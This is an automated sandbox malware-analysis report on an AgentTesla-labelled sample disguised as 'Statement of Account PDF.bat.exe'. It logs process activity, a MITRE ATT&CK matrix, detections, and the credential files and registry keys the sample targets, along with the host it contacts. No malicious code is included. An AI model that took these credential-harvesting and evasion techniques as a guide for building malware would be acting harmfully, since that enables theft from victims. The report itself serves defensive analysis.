                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe; Queries volume information: C:\Users\user\Desktop\Statement of Account PDF.bat.exe VolumeInformation
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe; Queries volume information: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe; Queries volume information: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

                      Source: Yara match; File source: Process Memory Space: Statement of Account PDF.bat.exe PID: 6984, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: Statement of Account PDF.bat.exe PID: 7252, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: gDdsxauPhk.exe PID: 7720, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: BjTxJte.exe PID: 8032, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: BjTxJte.exe PID: 7220, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: BjTxJte.exe PID: 7400, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: BjTxJte.exe PID: 7752, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe; File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe; File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe; File opened: C:\FTP Navigator\Ftplist.txt
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe; File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe; Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe; File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe; Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe; File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe; Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

                      Remote Access Functionality

                      Source: Yara match; File source: Process Memory Space: Statement of Account PDF.bat.exe PID: 6984, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: Statement of Account PDF.bat.exe PID: 7252, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: gDdsxauPhk.exe PID: 7720, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: BjTxJte.exe PID: 8032, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: BjTxJte.exe PID: 7220, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: BjTxJte.exe PID: 7400, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: BjTxJte.exe PID: 7752, type: MEMORYSTR
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 121 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Disable or Modify Tools | 2 OS Credential Dumping | 2 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 112 Process Injection | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 24 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | 1 Registry Run Keys / Startup Folder | 1 Scheduled Task/Job | 2 Obfuscated Files or Information | 1 Credentials in Registry | 1 Query Registry | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 Registry Run Keys / Startup Folder | 22 Software Packing | NTDS | 221 Security Software Discovery | Distributed Component Object Model | 21 Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Timestomp | LSA Secrets | 2 Process Discovery | SSH | 1 Clipboard Data | 23 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 151 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Masquerading | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 151 Virtualization/Sandbox Evasion | Proc Filesystem | 1 System Network Configuration Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 112 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
| IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 Hidden Files and Directories | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
                      Behavior graph (ID: 1432040; Sample: Statement of Account PDF.bat.exe; Start date: 26/04/2024; Architecture: WINDOWS; Score: 100)
                      Top-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Sigma detected: Scheduled temp file as task from temp location; 12 other signatures
                      Contacted hosts: mail.fascia-arch.com; api.ipify.org

                      • Statement of Account PDF.bat.exe (started)
                          Dropped: C:\Users\user\AppData\...\gDdsxauPhk.exe (PE32); C:\Users\user\AppData\Local\Temp\tmp690.tmp (XML)
                          Signatures: Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
                          • Statement of Account PDF.bat.exe (started)
                              DNS/IP: mail.fascia-arch.com, 50.87.195.61, 49736, 49739, 49753, UNIFIEDLAYER-AS-1US, United States
                              DNS/IP: api.ipify.org, 104.26.12.205, 443, 49734, 49737, CLOUDFLARENETUS, United States
                              Dropped: C:\Users\user\AppData\Roaming\...\BjTxJte.exe (PE32); C:\Users\user\...\BjTxJte.exe:Zone.Identifier (ASCII)
                              Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Hides that the sample has been downloaded from the Internet (zone.identifier)
                          • powershell.exe (started)
                              Signatures: Loading BitLocker PowerShell Module
                              • conhost.exe (started)
                              • WmiPrvSE.exe (started)
                          • 2 other processes
                              • conhost.exe (started)
                              • conhost.exe (started)
                      • gDdsxauPhk.exe (started)
                          Signatures: Multi AV Scanner detection for dropped file; Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Machine Learning detection for dropped file
                          • gDdsxauPhk.exe (started)
                          • 3 other processes
                              • conhost.exe (started)
                      • BjTxJte.exe (started)
                          • BjTxJte.exe (started)
                          • 2 other processes
                              • conhost.exe (started)
                      • BjTxJte.exe (started)
                          • BjTxJte.exe (started)
                              Signatures: Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc); Installs a global keyboard hook
                          • 2 other processes
                              • conhost.exe (started)

                      Source | Detection | Scanner | Label | Link
                      Statement of Account PDF.bat.exe | 47% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla |
                      Statement of Account PDF.bat.exe | 57% | Virustotal | | Browse
                      Statement of Account PDF.bat.exe | 100% | Joe Sandbox ML | |

                      Source | Detection | Scanner | Label | Link
                      C:\Users\user\AppData\Roaming\gDdsxauPhk.exe | 100% | Joe Sandbox ML | |
                      C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe | 100% | Joe Sandbox ML | |
                      C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe | 47% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla |
                      C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe | 57% | Virustotal | | Browse
                      C:\Users\user\AppData\Roaming\gDdsxauPhk.exe | 47% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla |
                      C:\Users\user\AppData\Roaming\gDdsxauPhk.exe | 57% | Virustotal | | Browse

                      No Antivirus matches

                      Source | Detection | Scanner | Label | Link
                      mail.fascia-arch.com | 0% | Virustotal | | Browse

                      Source | Detection | Scanner | Label | Link
                      http://www.tiro.com | 0% | URL Reputation | safe |
                      http://www.goodfont.co.kr | 0% | URL Reputation | safe |
                      http://www.carterandcone.coml | 0% | URL Reputation | safe |
                      http://r3.i.lencr.org/0 | 0% | URL Reputation | safe |
                      http://r3.i.lencr.org/0 | 0% | URL Reputation | safe |
                      http://www.sajatypeworks.com | 0% | URL Reputation | safe |
                      http://www.typography.netD | 0% | URL Reputation | safe |
                      http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe |
                      http://x1.c.lencr.org/0 | 0% | URL Reputation | safe |
                      http://x1.i.lencr.org/0 | 0% | URL Reputation | safe |
                      http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe |
                      http://r3.o.lencr.org0 | 0% | URL Reputation | safe |
                      http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe |
                      http://www.sandoll.co.kr | 0% | URL Reputation | safe |
                      http://www.urwpp.deDPlease | 0% | URL Reputation | safe |
                      http://www.sakkal.com | 0% | URL Reputation | safe |
                      http://www.founder.com.cn/cn/cThe | 0% | Avira URL Cloud | safe |
                      http://mail.fascia-arch.com | 0% | Avira URL Cloud | safe |
                      http://www.ascendercorp.com/typedesigners.htmlqX | 0% | Avira URL Cloud | safe |
                      http://www.founder.com.cn/cn/bThe | 0% | Avira URL Cloud | safe |
                      http://www.founder.com.cn/cn | 0% | Avira URL Cloud | safe |
                      http://www.zhongyicts.com.cn | 0% | Avira URL Cloud | safe |
                      http://www.founder.com.cn/cn/bThe | 0% | Virustotal | | Browse
                      http://www.zhongyicts.com.cn | 1% | Virustotal | | Browse
                      http://mail.fascia-arch.com | 0% | Virustotal | | Browse
                      http://www.founder.com.cn/cn/cThe | 0% | Virustotal | | Browse
                      http://www.founder.com.cn/cn | 0% | Virustotal | | Browse

                      Name | IP | Active | Malicious | Antivirus Detection | Reputation
                      api.ipify.org | 104.26.12.205 | true | false | | high
                      mail.fascia-arch.com | 50.87.195.61 | true | true | | unknown

                      Name | Malicious | Antivirus Detection | Reputation
                      https://api.ipify.org/ | false | | high
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://www.apache.org/licenses/LICENSE-2.0Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.ascendercorp.com/typedesigners.htmlqXStatement of Account PDF.bat.exe, 00000000.00000002.1707110996.0000000005BF7000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.fontbureau.comStatement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.fontbureau.com/designersGStatement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.fontbureau.com/designers/?Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.founder.com.cn/cn/bTheStatement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://account.dyn.com/Statement of Account PDF.bat.exe, 00000000.00000002.1700653245.0000000004337000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000012.00000002.1856813364.0000000004928000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000016.00000002.1916411729.0000000000402000.00000040.00000400.00020000.00000000.sdmp, BjTxJte.exe, 00000019.00000002.1945703172.0000000004798000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.fontbureau.com/designers?Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.tiro.comStatement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
